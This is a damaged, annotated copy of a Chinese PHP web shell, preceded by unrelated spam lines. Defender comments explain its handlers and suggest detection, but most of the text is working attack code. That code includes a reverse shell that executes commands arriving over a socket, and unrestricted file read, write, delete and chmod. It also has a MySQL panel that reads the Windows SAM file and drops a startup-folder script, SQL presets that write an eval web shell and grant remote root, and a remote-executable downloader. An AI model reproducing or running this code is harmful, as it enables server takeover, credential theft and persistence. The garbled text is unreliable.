阿凡达百度云id8d05103a183e7e63812e4b9e91d7ae96怎么安装

比特币交易4fc62ebc4f7b1b2311ec1fcba48efe16dda9e2f07c40fb3;//无需验证密码!
// Defender annotation: start-up section of a PHP web-shell sample. This copy is
// extraction-damaged (`<`/`>` show up as `&`, closing braces are missing), so it is
// not runnable as shown; the notes describe only what the visible lines do.
$shellname='hello~地球~猴子星球欢迎你 ';
define('myaddress',__FILE__);
// Only fatal and parse errors are reported; warnings and notices stay hidden.
error_reporting(E_ERROR | E_PARSE);
header("content-Type: text/ charset=gb2312");
// A limit of 0 removes the script execution time limit.
@set_time_limit(0);
ob_start();
// NOTE(review): $password and $myurl are not assigned in the visible lines; the
// assignments appear to have been lost in extraction. Confirm against a clean sample.
define('envlpass',$password);
define('shellname',$shellname);
define('myurl',$myurl);
// When magic_quotes_gpc is active, strip the added backslashes so POST/GET values
// reach the later handlers unescaped.
if(@get_magic_quotes_gpc()){
foreach($_POST as $k =& $v) $_POST[$k] = stripslashes($v);
foreach($_GET as $k =& $v) $_GET[$k] = stripslashes($v);
/*---End Login---*/
// Defender annotation: three GET-driven file actions handled before the menu switch.
//   down  -> the request-supplied value is passed straight to do_down()
//   pack  -> a directory is archived through class eanver and sent as "eanver.tar.gz"
//   unzip -> start_unzip() receives a request-supplied archive path and target dir
// The helpers are defined outside the visible lines. No path restriction is visible
// here, so any file the PHP process can read or write is in scope.
// Log-review indicators: query strings carrying `down=`, `pack=`, `unzip=`/`todir=`.
if(isset($_GET['down'])) do_down($_GET['down']);
if(isset($_GET['pack'])){
$dir = do_show($_GET['pack']);
$zip = new eanver($dir);
// NOTE(review): the next statement is truncated in this copy.
$out = $zip-&
do_download($out,"eanver.tar.gz");
if(isset($_GET['unzip'])){
css_main();
start_unzip($_GET['unzip'],$_GET['unzip'],$_GET['todir']);
// Defender annotation: environment constants and request-parameter intake.
// root_dir is the directory holding this script; run_win is true when PHP_OS
// starts with "WIN".
define('root_dir',str_replace('\\','/',dirname(myaddress)).'/');
define('run_win',substr(PHP_OS, 0, 3) == "WIN");
define('my_shell',str_path(root_dir.$_SERVER['SCRIPT_NAME']));
// `eanver` (GET) selects the handler in the later switch($eanver); `path` and `p`
// carry file-system paths taken directly from the request.
$eanver = isset($_GET['eanver']) ? $_GET['eanver'] : "";
$doing = isset($_POST['doing']) ? $_POST['doing'] : "";
// NOTE(review): the default value on the next line is truncated in this copy.
$path = isset($_GET['path']) ? $_GET['path'] : root_
$name = isset($_POST['name']) ? $_POST['name'] : "";
$img = isset($_GET['img']) ? $_GET['img'] : "";
$p = isset($_GET['p']) ? $_GET['p'] : "";
$pp = urlencode(dirname($p));
if($img) css_img($img);
// Dumps the full PHP configuration to the requester (information disclosure).
if($eanver == "phpinfo") die(phpinfo());
// Logout clears the `envlpass` cookie; that cookie name is a usable indicator when
// reviewing web-server or proxy logs.
if($eanver == 'logout'){
setcookie('envlpass',null);
die('&meta http-equiv="refresh" content="0;URL=?"&');
// Defender annotation: menu table mapping action keys to display labels, in four
// groups (roughly: information, privilege-escalation tools, bulk operations,
// script plug-ins). The keys are the values sent as `?eanver=<key>`, which makes
// them practical search terms for access logs: upfiles, phpinfo, info_f, eval,
// sqlshell, mysql_exec, myexp, servu, nc, downloader, port, guama, tihuan,
// scanfile, scanphp, getcode.
$class = array(
"信息操作" =& array("upfiles" =& "上传文件","phpinfo" =& "基本信息","info_f" =& "系统信息","eval" =& "执行PHP脚本"),
"提权工具" =& array("sqlshell" =& "执行SQL执行","mysql_exec" =& "MYSQL操作","myexp" =& "MYSQL提权","servu" =& "Serv-U提权","nc" =& "NC反弹","downloader" =& "文件下载","port" =& "端口扫描"),
"批量操作" =& array("guama" =& "批量挂马清马","tihuan" =& "批量替换内容","scanfile" =& "批量搜索文件","scanphp" =& "批量查找木马"),
"脚本插件" =& array("getcode" =& "获取网页源码")
// Status strings indexed 0-7: save, upload, modify, delete, each as success/failure.
$msg = array("0" =& "保存成功","1" =& "保存失败","2" =& "上传成功","3" =& "上传失败","4" =& "修改成功","5" =& "修改失败","6" =& "删除成功","7" =& "删除失败");
css_main();
switch($eanver){
case "left":
css_left();
html_n("&dl&&dt&&a href=\"#\" onclick=\"showHide('items1');\" target=\"_self\"&");
html_img("title");html_n(" 本地硬盘&/a&&/dt&&dd id=\"items1\" style=\"display:\"&&ul&");
$ROOT_DIR = File_Mode();
html_n("&li&&a title='$ROOT_DIR' href='?eanver=main&path=$ROOT_DIR' target='main'&网站根目录&/a&&/li&");
html_n("&li&&a href='?eanver=main' target='main'&本程序目录&/a&&/li&");
for ($i=66;$i&=90;$i++){$drive= chr($i).':';
if (is_dir($drive."/")){$vol=File_Str("vol $drive");if(empty($vol))$vol=$
html_n("&li&&a title='$drive' href='?eanver=main&path=$drive' target='main'&本地磁盘($drive)&/a&&/li&");}}
html_n("&/ul&&/dd&&/dl&");
foreach($class as $name =& $array){
html_n("&dl&&dt&&a href=\"#\" onclick=\"showHide('items$i');\" target=\"_self\"&");
html_img("title");html_n(" $name&/a&&/dt&&dd id=\"items$i\" style=\"display:\"&&ul&");
foreach($array as $url =& $value){
html_n("&li&&a href=\"?eanver=$url\" target='main'&$value&/a&&/li&");
html_n("&/ul&&/dd&&/dl&");
html_n("&dl&&dt&&a href=\"#\" onclick=\"showHide('items$i');\" target=\"_self\"&");
html_img("title");html_n(" 其它操作&/a&&/dt&&dd id=\"items$i\" style=\"display:\"&&ul&");
html_n("&li&&a title='做好事,不留名' href='#' target=\"main\"&做好事,不留名&/a&&/li&");
html_n("&li&&a title='安全退出' href='?eanver=logout' target=\"main\"&安全退出&/a&&/li&");
html_n("&/ul&&/dd&&/dl&");
html_n("&/div&");
case "main":
css_js("1");
$dir = @dir($path);
$REAL_DIR = File_Str(realpath($path));
if(!empty($_POST['actall'])){echo '&div class="actall"&'.File_Act($_POST['files'],$_POST['actall'],$_POST['inver'],$REAL_DIR).'&/div&';}
$NUM_D = $NUM_F = 0;
if(!$_SERVER['SERVER_NAME']) $GETURL = ''; else $GETURL = 'http://'.$_SERVER['SERVER_NAME'].'/';
$ROOT_DIR = File_Mode();
html_n("&table width=\"100%\" border=0 bgcolor=\"#555555\"&&tr&&td&&form method='GET'&地址:&input type='hidden' name='eanver' value='main'&");
html_n("&input type='text' size='80' name='path' value='$path'& &input type='submit' value='转到'&&/form&");
html_n("&br&&form method='POST' enctype=\"multipart/form-data\" action='?eanver=editr&p=".urlencode($path)."'&");
html_n("&input type=\"button\" value=\"新建文件\" onclick=\"rusurechk('newfile.php','?eanver=editr&p=".urlencode($path)."&refile=1&name=');\"& &input type=\"button\" value=\"新建目录\" onclick=\"rusurechk('newdir','?eanver=editr&p=".urlencode($path)."&redir=1&name=');\"&");
html_input("file","upfilet","","&&&&& ");
html_input("submit","uploadt","上传");
if(!empty($_POST['newfile'])){
if(isset($_POST['bin'])) $bin = $_POST['bin']; else $bin = "wb";
if (substr(PHP_VERSION,0,1)&=5){if(($_POST['charset']=='GB2312') or ($_POST['charset']=='GBK')){}else{$_POST['txt'] = iconv("gb2312//IGNORE",$_POST['charset'],$_POST['txt']);}}
echo do_write($_POST['newfile'],$bin,$_POST['txt']) ? '&br&'.$_POST['newfile'].' '.$msg[0] : '&br&'.$_POST['newfile'].' '.$msg[1];
@touch($_POST['newfile'],@strtotime($_POST['time']));
html_n('&/form&&/td&&/tr&&/table&&form method="POST" name="fileall" id="fileall" action="?eanver=main&path='.$path.'"&&table width="100%" border=0 bgcolor="#555555"&&tr height="25"&&td width="45%"&&b&');
html_a('?eanver=main&path='.uppath($path),'&b&上级目录&/b&');
html_n('&/b&&/td&&td align="center" width="10%"&&b&操作&/b&&/td&&td align="center" width="5%"&');
html_n('&b&文件属性&/b&&/td&&td align="center" width="10%"&&b&修改时间&/b&&/td&&td align="center" width="10%"&&b&文件大小&/b&&/td&&/tr&');
while($dirs = @$dir-&read()){
if($dirs == '.' or $dirs == '..')
$dirpath = str_path("$path/$dirs");
if(is_dir($dirpath)){
$perm = substr(base_convert(fileperms($dirpath),10,8),-4);
$filetime = @date('Y-m-d H:i:s',@filemtime($dirpath));
$dirpath = urlencode($dirpath);
html_n('&tr height="25"&&td&&input type="checkbox" name="files[]" value="'.$dirs.'"&');
html_img("dir");
html_a('?eanver=main&path='.$dirpath,$dirs);
html_n('&/td&&td align="center"&');
html_n("&a href=\"#\" onClick=\"rusurechk('$dirs','?eanver=rename&p=$dirpath&newname=');\"&改名&/a&");
html_n("&a href=\"#\" onClick=\"rusuredel('$dirs','?eanver=deltree&p=$dirpath');\"&删除&/a& ");
html_a('?pack='.$dirpath,'打包');
html_n('&/td&&td align="center"&');
html_a('?eanver=perm&p='.$dirpath.'&chmod='.$perm,$perm);
html_n('&/td&&td align="center"&'.$filetime.'&/td&&td align="right"&');
html_n('&/td&&/tr&');
@$dir-&rewind();
while($files = @$dir-&read()){
if($files == '.' or $files == '..')
$filepath = str_path("$path/$files");
if(!is_dir($filepath)){
$fsize = @filesize($filepath);
$fsize = File_Size($fsize);
= substr(base_convert(fileperms($filepath),10,8),-4);
$filetime = @date('Y-m-d H:i:s',@filemtime($filepath));
$Fileurls = str_replace(File_Str($ROOT_DIR.'/'),$GETURL,$filepath);
$todir=$ROOT_DIR.'/zipfile';
$filepath = urlencode($filepath);
$it=substr($filepath,-3);
html_n('&tr height="25"&&td&&input type="checkbox" name="files[]" value="'.$files.'"&');
html_img(css_showimg($files));
html_a($Fileurls,$files);
html_n('&/td&&td align="center"&');
if(($it=='.gz') or ($it=='zip') or ($it=='tar') or ($it=='.7z'))
html_a('?unzip='.$filepath,'解压','title="解压'.$files.'" onClick="rusurechk(\''.$todir.'\',\'?unzip='.$filepath.'&todir=\');"');
html_a('?eanver=editr&p='.$filepath,'编辑','title="编辑'.$files.'"');
html_n("&a href=\"#\" onClick=\"rusurechk('$files','?eanver=rename&p=$filepath&newname=');\"&改名&/a&");
html_n("&a href=\"#\" onClick=\"rusuredel('$files','?eanver=del&p=$filepath');\"&删除&/a& ");
html_n("&a href=\"#\" onClick=\"rusurechk('".urldecode($filepath)."','?eanver=copy&p=$filepath&newcopy=');\"&复制&/a&");
html_n('&/td&&td align="center"&');
html_a('?eanver=perm&p='.$filepath.'&chmod='.$perm,$perm);
html_n('&/td&&td align="center"&'.$filetime.'&/td&&td align="right"&');
html_a('?down='.$filepath,$fsize,'title="下载'.$files.'"');
html_n('&/td&&/tr&');
@$dir-&close();
if(!$Filetime) $Filetime = gmdate('Y-m-d H:i:s',time() + 3600 * 8);
print&&&END
&div class="actall"& &input type="hidden" id="actall" name="actall" value="undefined"&
&input type="hidden" id="inver" name="inver" value="undefined"&
&input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form);"&
&input type="button" value="复制" onclick="SubmitUrl('复制所选文件到路径: ','{$REAL_DIR}','a');"&
&input type="button" value="删除" onclick="Delok('所选文件','b');"&
&input type="button" value="属性" onclick="SubmitUrl('修改所选文件属性值为: ','0666','c');"&
&input type="button" value="时间" onclick="CheckDate('{$Filetime}','d');"&
&input type="button" value="打包" onclick="SubmitUrl('打包并下载所选文件下载名为: ','{$_SERVER['SERVER_NAME']}.tar.gz','e');"&
目录({$NUM_D}) / 文件({$NUM_F})&/div&
case "editr":
css_js("2");
if(!empty($_POST['uploadt'])){
echo @copy($_FILES['upfilet']['tmp_name'],str_path($p.'/'.$_FILES['upfilet']['name'])) ? html_a("?eanver=main",$_FILES['upfilet']['name'].' '.$msg[2]) : msg($msg[3]);
die('&meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'"&');
if(!empty($_GET['redir'])){
$name=$_GET['name'];
$newdir = str_path($p.'/'.$name);
@mkdir($newdir,0777) ? html_a("?eanver=main",$name.' '.$msg[0]) : msg($msg[1]);
die('&meta http-equiv="refresh" content="1;URL=?eanver=main&path='.urlencode($p).'"&');
if(!empty($_GET['refile'])){
$name=$_GET['name'];
$jspath=urlencode($p.'/'.$name);
$pp = urlencode($p);
$p = str_path($p.'/'.$name);
$FILE_CODE = "";
$charset= 'GB2312';
$FILE_TIME =date('Y-m-d H:i:s',time()+3600*8);
if(@file_exists($p)) echo '发现目录下有"同名"文件&br&';
$jspath=urlencode($p);
$FILE_TIME = date('Y-m-d H:i:s',filemtime($p));
$FILE_CODE=@file_get_contents($p);
if (substr(PHP_VERSION,0,1)&=5){
if(empty($_GET['charset'])){
if(TestUtf8($FILE_CODE)&1){$charset= 'UTF-8';$FILE_CODE = iconv("UTF-8","gb2312//IGNORE",$FILE_CODE);}else{$charset= 'GB2312';}
if($_GET['charset']=='GB2312'){$charset= 'GB2312';}else{$charset= $_GET['charset'];$FILE_CODE = iconv($_GET['charset'],"gb2312//IGNORE",$FILE_CODE);}
$FILE_CODE = htmlspecialchars($FILE_CODE);
print&&&END
&div class="actall"&查找内容: &input name="searchs" type="text" value="{$dim}" style="width:500"&
&input type="button" value="查找" onclick="search(searchs.value)"&&/div&
&form method='POST' id="editor"
action='?eanver=main&path={$pp}'&
&div class="actall"&
&input type="text" name="newfile"
id="newfile" value="{$p}" style="width:750"&指定编码:&input name="charset" id="charset" value="{$charset}" Type="text" style="width:80" onkeydown="if(event.keyCode==13)window.location='?eanver=editr&p={$jspath}&charset='+this."&
&input type="button" value="选择" onclick="window.location='?eanver=editr&p={$jspath}&charset='+this.form.charset." style="width:50"&
html_select(array("GB2312" =& "GB2312","UTF-8" =& "UTF-8","BIG5" =& "BIG5","EUC-KR" =& "EUC-KR","EUC-JP" =& "EUC-JP","SHIFT-JIS" =& "SHIFT-JIS","WINDOWS-874" =& "WINDOWS-874","ISO-8859-1" =& "ISO-8859-1"),$charset,"onchange=\"window.location='?eanver=editr&p={$jspath}&charset='+options[selectedIndex].\"");
print&&&END
&div class="actall"&&textarea name="txt" style="width:100%;height:380"&{$FILE_CODE}&/textarea&&/div&
&div class="actall"&文件修改时间 &input type="text" name="time" id="mtime" value="{$FILE_TIME}" style="width:150"& &input type="checkbox" name="bin" value="wb+" size="" checked&以二进制形式保存文件(建议使用)&/div&
&div class="actall"&&input type="button" value="保存" onclick="CheckDate();" style="width:80"& &input name='reset' type='reset' value='重置'&
&input type="button" value="返回" onclick="window.location='?eanver=main&path={$pp}';" style="width:80"&&/div&
// Defender annotation: rename / recursive delete / delete / copy handlers.
// Each acts on $p, which the script takes from the `p` query parameter, with no
// path restriction visible in these lines; the effective limit is whatever the
// PHP process account may touch. Failures are silenced with `@`.
// Indicators: requests with eanver=rename|deltree|del|copy, and file changes
// in the web root that do not match a deployment.
// Mitigation: least-privilege file ownership for the web-server account and
// file-integrity monitoring on served directories.
case "rename":
html_n("&tr&&td&");
$newname = urldecode($pp).'/'.urlencode($_GET['newname']);
@rename($p,$newname) ? html_a("?eanver=main&path=$pp",urlencode($_GET['newname']).' '.$msg[4]) : msg($msg[5]);
die('&meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'"&');
case "deltree":
html_n("&tr&&td&");
// do_deltree() is defined outside the visible lines.
do_deltree($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]);
die('&meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'"&');
case "del":
html_n("&tr&&td&");
@unlink($p) ? html_a("?eanver=main&path=$pp",$p.' '.$msg[6]) : msg($msg[7]);
die('&meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'"&');
case "copy":
html_n("&tr&&td&");
// The destination is split on "/" and every segment after the first is URL-encoded
// before being re-joined.
$newpath = explode('/',$_GET['newcopy']);
$pathr[0] = $newpath[0];
for($i=1;$i & count($newpath);$i++){
$pathr[] = urlencode($newpath[$i]);
$newcopy = implode('/',$pathr);
@copy($p,$newcopy) ? html_a("?eanver=main&path=$pp",$newcopy.' '.$msg[4]) : msg($msg[5]);
die('&meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'"&');
// Defender annotation: permission-change handler. The mode is limited to the six
// literal values in the inner switch, but the target $p is request-supplied.
// A world-writable mode (0777/0666) appearing on web content is worth alerting on.
case "perm":
html_n("&form method='POST'&&tr&&td&".$p.' 属性为: ');
// Directories are offered the executable modes, files the non-executable ones.
if(is_dir($p)){
html_select(array("0777" =& "0777","0755" =& "0755","0555" =& "0555"),$_GET['chmod']);
html_select(array("0666" =& "0666","0644" =& "0644","0444" =& "0444"),$_GET['chmod']);
html_input("submit","save","修改");
if($_POST['class']){
// NOTE(review): no `break` is visible between these cases. It may have been lost
// in extraction; as printed, execution would fall through to the last chmod.
switch($_POST['class']){
case "0777": $change = @chmod($p,0777);
case "0755": $change = @chmod($p,0755);
case "0555": $change = @chmod($p,0555);
case "0666": $change = @chmod($p,0666);
case "0644": $change = @chmod($p,0644);
case "0444": $change = @chmod($p,0444);
$change ? html_a("?eanver=main&path=$pp",$msg[4]) : msg($msg[5]);
die('&meta http-equiv="refresh" content="1;URL=?eanver=main&path='.$pp.'"&');
html_n("&/td&&/tr&&/form&");
case "info_f":
$dis_func = get_cfg_var("disable_functions");
$upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
$adminmail = (isset($_SERVER['SERVER_ADMIN'])) ? "&a href=\"mailto:".$_SERVER['SERVER_ADMIN']."\"&".$_SERVER['SERVER_ADMIN']."&/a&" : "&a href=\"mailto:".get_cfg_var("sendmail_from")."\"&".get_cfg_var("sendmail_from")."&/a&";
if($dis_func == ""){$dis_func = "No";}else{$dis_func = str_replace(" ","&br&",$dis_func);$dis_func = str_replace(",","&br&",$dis_func);}
$phpinfo = (!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
$info = array(
array("服务器时间",date("Y年m月d日 h:i:s",time())),
array("服务器域名","&a href=\"http://".$_SERVER['SERVER_NAME']."\" target=\"_blank\"&".$_SERVER['SERVER_NAME']."&/a&"),
array("服务器IP地址",gethostbyname($_SERVER['SERVER_NAME'])),
array("服务器操作系统",PHP_OS),
array("服务器操作系统文字编码",$_SERVER['HTTP_ACCEPT_LANGUAGE']),
array("服务器解译引擎",$_SERVER['SERVER_SOFTWARE']),
array("你的IP",$_SERVER["REMOTE_ADDR"]),
array("Web服务端口",$_SERVER['SERVER_PORT']),
array("PHP运行方式",strtoupper(php_sapi_name())),
array("PHP版本",PHP_VERSION),
array("运行于安全模式",Info_Cfg("safemode")),
array("服务器管理员",$adminmail),
array("本文件路径",myaddress),
array("允许使用 URL 打开文件 allow_url_fopen",Info_Cfg("allow_url_fopen")),
array("允许使用curl_exec",Info_Fun("curl_exec")),
array("允许动态加载链接库 enable_dl",Info_Cfg("enable_dl")),
array("显示错误信息 display_errors",Info_Cfg("display_errors")),
array("自动定义全局变量 register_globals",Info_Cfg("register_globals")),
array("magic_quotes_gpc",Info_Cfg("magic_quotes_gpc")),
array("程序最多允许使用内存量 memory_limit",Info_Cfg("memory_limit")),
array("POST最大字节数 post_max_size",Info_Cfg("post_max_size")),
array("允许最大上传文件 upload_max_filesize",$upsize),
array("程序最长运行时间 max_execution_time",Info_Cfg("max_execution_time")."秒"),
array("被禁用的函数 disable_functions",$dis_func),
array("phpinfo()",$phpinfo),
array("目前还有空余空间diskfreespace",intval(diskfreespace(".") / (1024 * 1024)).'Mb'),
array("图形处理 GD Library",Info_Fun("imageline")),
array("IMAP电子邮件系统",Info_Fun("imap_close")),
array("MySQL数据库",Info_Fun("mysql_close")),
array("SyBase数据库",Info_Fun("sybase_close")),
array("Oracle数据库",Info_Fun("ora_close")),
array("Oracle 8 数据库",Info_Fun("OCILogOff")),
array("PREL相容语法 PCRE",Info_Fun("preg_match")),
array("PDF文档支持",Info_Fun("pdf_close")),
array("Postgre SQL数据库",Info_Fun("pg_close")),
array("SNMP网络管理协议",Info_Fun("snmpget")),
array("压缩文件支持(Zlib)",Info_Fun("gzclose")),
array("XML解析",Info_Fun("xml_set_object")),
array("FTP",Info_Fun("ftp_login")),
array("ODBC数据库连接",Info_Fun("odbc_close")),
array("Session支持",Info_Fun("session_start")),
array("Socket支持",Info_Fun("fsockopen")),
$shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host");
echo '&table width="100%" border="0"&';
for($i = 0;$i & count($info);$i++){echo '&tr&&td width="40%"&'.$info[$i][0].'&/td&&td&'.$info[$i][1].'&/td&&/tr&'."\n";}
try{$registry_proxystring = $shell-&RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\PortNumber");
$Telnet = $shell-&RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort");
$PcAnywhere = $shell-&RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort");
}catch(Exception $e){}
echo '&tr&&td width="40%"&Terminal Service端口为&/td&&td&'.$registry_proxystring.'&/td&&/tr&'."\n";
echo '&tr&&td width="40%"&Telnet端口为&/td&&td&'.$Telnet.'&/td&&/tr&'."\n";
echo '&tr&&td width="40%"&PcAnywhere端口为&/td&&td&'.$PcAnywhere.'&/td&&/tr&'."\n";
echo '&/table&';
// Defender annotation: outbound ("reverse") command channel.
// The handler opens a TCP connection from the web server to the POST-supplied
// host/port, then loops: read one line from the socket, run it through the
// backtick (shell execution) operator, write the output back.
// Detection: outbound TCP sessions initiated by the web-server/PHP process;
// shell child processes under the web-server account; the static banner and
// prompt strings written to the socket below can serve as content signatures.
// Mitigation: egress filtering for web servers; the backtick operator is
// unavailable when shell_exec is listed in disable_functions.
case "nc":
// Host defaults to the requester's address, port to 1019.
$M_ip = isset($_POST['mip']) ? $_POST['mip'] : $_SERVER["REMOTE_ADDR"];
$B_port = isset($_POST['bport']) ? $_POST['bport'] : '1019';
print&&&END
&form method="POST"&
&div class="actall"&使用方法:&br&
先在自己电脑运行"nc -l -p 1019"&br&
然后在此填写你电脑的IP,点连接!&/div&
&div class="actall"&你的IP &input type="text" name="mip" value="{$M_ip}" style="width:100"& 端口号 &input type="text" name="bport" value="{$B_port}" style="width:50"&&/div&
&div class="actall"&&input type="submit" value="连接" style="width:80"&&/div&
if((!empty($_POST['mip'])) && (!empty($_POST['bport'])))
echo '&div class="actall"&';
$mip=$_POST['mip'];
$bport=$_POST['bport'];
$fp=fsockopen($mip , $bport , $errno, $errstr);
if (!$fp){
$result = "Error: could not open socket connection";
fputs ($fp ,"\n*********************************************\n
hacking url:http://www.mumasec.tk/ is ok!
\n*********************************************\n\n");
while(!feof($fp)){
fputs ($fp," [r00t@H4c3ing:/root]# ");
$result= fgets ($fp, 4096);
// Each received line is executed as an operating-system command.
$message=`$result`;
fputs ($fp,"--& ".$message."\n");
fclose ($fp);
echo '&/div&';
// Defender annotation: MySQL abuse panel with three modes selected by `?o=`:
// run an arbitrary statement (default), write a file through the database
// (o=u), read a file through the database (o=d).
// It uses the legacy mysql_* API, which was removed in PHP 7, so this handler
// only works on older runtimes.
// What makes the file modes possible is the database account, not PHP: they
// need the MySQL FILE privilege. Hardening: application accounts without FILE
// or GRANT rights, a restrictive secure_file_priv, no remote root logins, and a
// database service account that cannot write to start-up or web directories.
// Detection: statements containing load_file(...), INTO DUMPFILE or
// INTO OUTFILE, and GRANT ... TO 'root'@'%' in the MySQL general/audit log.
case "sqlshell":
$MSG_BOX = '';
// Form defaults: local server, root with an empty password, `mysql` schema.
$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();';
if(isset($_POST['mhost']) && isset($_POST['muser']))
$mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport'];
if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata);
else $MSG_BOX = '连接MYSQL失败';
// File-read mode: the path is hex-encoded into a load_file() query and the
// result is returned to the browser as a download. The default target is the
// Windows SAM repair copy.
$downfile = 'c:/windows/repair/sam';
if(!empty($_POST['downfile']))
$downfile = File_Str($_POST['downfile']);
$binpath = bin2hex($downfile);
$query = 'select load_file(0x'.$binpath.')';
if($result = @mysql_query($query,$conn))
$k = 0; $downcode = '';
while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;}
$filedown = basename($downfile);
if(!$filedown) $filedown = 'envl.tmp';
$array = explode('.', $filedown);
$arrayend = array_pop($array);
header('Content-type: application/x-'.$arrayend);
header('Content-Disposition: filename='.$filedown);
header('Content-Length: '.strlen($downcode));
else $MSG_BOX = '下载文件失败';
$o = isset($_GET['o']) ? $_GET['o'] : '';
print&&&END
&form method="POST" name="nform" id="nform"&
&center&&div class="actall"&&a href="?eanver=sqlshell"&[MYSQL执行语句]&/a&
&a href="?eanver=sqlshell&o=u"&[MYSQL上传文件]&/a&
&a href="?eanver=sqlshell&o=d"&[MYSQL下载文件]&/a&&/div&
&div class="actall"&
地址 &input type="text" name="mhost" value="{$mhost}" style="width:110px"&
端口 &input type="text" name="mport" value="{$mport}" style="width:110px"&
用户 &input type="text" name="muser" value="{$muser}" style="width:110px"&
密码 &input type="text" name="mpass" value="{$mpass}" style="width:110px"&
库名 &input type="text" name="mdata" value="{$mdata}" style="width:110px"&
&div class="actall" style="height:220"&
if($o == 'u')
// File-write mode: the uploaded bytes are hex-encoded into a one-column table
// `a`, then written out with SELECT ... INTO DUMPFILE. The default destination
// is a script in the all-users Startup folder, i.e. a persistence location.
$uppath = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/exp.vbs';
if(!empty($_POST['uppath']))
$uppath = $_POST['uppath'];
$query = 'Create TABLE a (cmd text NOT NULL);';
if(@mysql_query($query,$conn))
if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));}
else{$tmp = File_Str(dirname(myaddress)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}}
$query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));';
if(@mysql_query($query,$conn))
$query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';';
$MSG_BOX = @mysql_query($query,$conn) ? '上传文件成功' : '上传文件失败';
else $MSG_BOX = '插入临时表失败';
// NOTE(review): as printed, this DROP names no table, so table `a` may be left
// behind in the selected schema, which would be a forensic artifact. Confirm
// against a clean copy.
@mysql_query('Drop TABLE IF EXISTS',$conn);
else $MSG_BOX = '创建临时表失败';
print&&&END
&br&&br&上传路径 &input type="text" name="uppath" value="{$uppath}" style="width:500px"&
&br&&br&选择文件 &input type="file" name="upfile" style="width:500height:22"&
&/div&&div class="actall"&&input type="submit" value="上传" style="width:80"&
elseif($o == 'd')
print&&&END
&br&&br&&br&下载文件 &input type="text" name="downfile" value="{$downfile}" style="width:500px"&
&/div&&div class="actall"&&input type="submit" value="下载" style="width:80"&
if(!empty($_POST['msql']))
// Statement mode: the POSTed text is sent to the server unchanged.
$msql = $_POST['msql'];
if($result = @mysql_query($msql,$conn))
$MSG_BOX = '执行SQL语句成功&br&';
while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
else $MSG_BOX .= mysql_error();
print&&&END
&script language="javascript"&
function nFull(i){
Str = new Array(11);
Str[0] = "select version();";
Str[1] = "select load_file(0x633A5C5C735CDEC5C6D652E786D6C) FROM user into outfile 'D:/web/iis.txt'";
Str[2] = "select '&?php eval(\$_POST[cmd]);?&' into outfile 'F:/web/bak.php';";
Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;";
nform.msql.value = Str[i];
&textarea name="msql" style="width:700height:200"&{$msql}&/textarea&&/div&
&div class="actall"&
&select onchange="return nFull(options[selectedIndex].value)"&
&option value="0" selected&显示版本&/option&
&option value="1"&导出文件&/option&
&option value="2"&写入文件&/option&
&option value="3"&开启外连&/option&
&input type="submit" value="执行" style="width:80"&
if($MSG_BOX != '') echo '&/div&&div class="actall"&'.$MSG_BOX.'&/div&&/center&&/form&';
else echo '&/div&&/center&&/form&';
// Defender annotation: server-side fetch-and-save. The POSTed URL is read with
// file_get_contents() and the bytes are written to the POSTed path through
// File_Write() (defined outside the visible lines); the default file name is
// an .exe next to this script.
// Detection: outbound HTTP requests initiated by the PHP process, and new
// executable files created by the web-server account.
// Mitigation: allow_url_fopen=Off stops file_get_contents() from opening
// remote URLs; egress filtering; no write access for the web-server account
// outside dedicated upload directories.
case "downloader":
$Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe';
$Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe');
print&&&END
&form method="POST"&
&div class="actall"&超连接 &input name="durl" value="{$Com_durl}" type="text" style="width:600"&&/div&
&div class="actall"&下载到 &input name="dpath" value="{$Com_dpath}" type="text" style="width:600"&&/div&
&div class="actall"&&input value="下载" type="submit" style="width:80"&&/div&&/form&
if((!empty($_POST['durl'])) && (!empty($_POST['dpath'])))
echo '&div class="actall"&';
$contents = @file_get_contents($_POST['durl']);
if(!$contents) echo '无法读取要下载的数据';
else echo File_Write($_POST['dpath'],$contents,'wb') ? '下载文件成功' : '下载文件失败';
echo '&/div&';
case "issql":
session_start();
if($_POST['sqluser'] && $_POST['sqlpass']){
$_SESSION['sql_user'] = $_POST['sqluser'];
$_SESSION['sql_password'] = $_POST['sqlpass'];
if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];}
else{$_SESSION['sql_host'] = 'localhost';}
if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];}
